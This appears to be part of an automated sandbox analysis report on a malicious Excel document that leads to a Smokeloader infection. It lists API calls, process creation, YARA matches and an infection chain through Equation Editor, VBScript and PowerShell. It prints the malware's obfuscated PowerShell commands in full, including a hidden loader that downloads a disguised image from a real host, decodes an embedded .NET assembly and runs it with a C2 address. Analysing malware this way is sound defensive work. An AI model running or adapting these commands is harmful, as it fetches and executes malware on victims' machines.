              Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_00081016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpi,CreateToolhelp32Snapshot,Process32First,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep,24_2_00081016
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_00081A80 NtCreateSection,NtMapViewOfSection,24_2_00081A80
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_00081819 lstrcmpi,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,24_2_00081819
              Source: C:\Windows\explorer.exeCode function: 25_2_000E355C RtlAllocateHeap,NtUnmapViewOfSection,25_2_000E355C
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 28_2_000C1016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep,28_2_000C1016
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 28_2_000C1B26 NtCreateSection,NtMapViewOfSection,28_2_000C1B26
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 28_2_000C18BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,28_2_000C18BF
              Source: C:\Windows\explorer.exeCode function: 29_2_0006370C RtlAllocateHeap,NtUnmapViewOfSection,29_2_0006370C
              Source: C:\Windows\explorer.exeFile deleted: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0045549812_2_00455498
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_004551E812_2_004551E8
              Source: C:\Windows\explorer.exeCode function: 14_2_03F1284014_2_03F12840
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_0008219818_2_00082198
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_0008C2F918_2_0008C2F9
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_0009B35C18_2_0009B35C
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_000D443818_2_000D4438
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_0009B97E18_2_0009B97E
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00086E6A18_2_00086E6A
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_000A5F0818_2_000A5F08
              Source: C:\Windows\explorer.exeCode function: 19_2_00061E2019_2_00061E20
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_0008170B21_2_0008170B
              Source: C:\Windows\explorer.exeCode function: 23_2_000E2C0023_2_000E2C00
              Source: C:\Windows\explorer.exeCode function: 25_2_000E205425_2_000E2054
              Source: C:\Windows\explorer.exeCode function: 25_2_000E286025_2_000E2860
              Source: C:\Windows\explorer.exeCode function: 29_2_00062A0429_2_00062A04
              Source: C:\Windows\explorer.exeCode function: 29_2_000620F429_2_000620F4
              Source: ~WRF{D9BCE685-2557-45B4-B3BC-EEF401A63014}.tmp.4.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\rugtucw D2F0B87E2D2707685C4D35F8F05B42FB8326EF4E70D16097B8837DABA06AC961
              Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 00087F70 appears 32 times
              Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 00088801 appears 40 times
              Source: 0000000D.00000002.467103946.0000000000131000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 0000000D.00000002.467072313.0000000000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 3520, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 3620, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B25204E.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
              Source: classification engineClassification label: mal100.spre.bank.troj.spyw.expl.evad.winXLS@32/35@12/5
              Source: C:\Windows\explorer.exeCode function: 14_2_03F13BF4 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,SleepEx,14_2_03F13BF4
              Source: C:\Windows\explorer.exeCode function: 14_2_03F135E8 CoCreateInstance,14_2_03F135E8
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\26330000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\rugtucwMutant created: NULL
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR6576.tmpJump to behavior
              Source: #20240627_Edlen_A.xlsOLE indicator, Workbook stream: true
              Source: 26330000.0.drOLE indicator, Workbook stream: true
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs"
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs"
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhD
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
              Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {2B2AF159-87EA-4DB0-87E1-2E594ED3F3FE} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
              Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\rugtucw C:\Users\user\AppData\Roaming\rugtucw
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs" Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
              Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\rugtucw C:\Users\user\AppData\Roaming\rugtucwJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
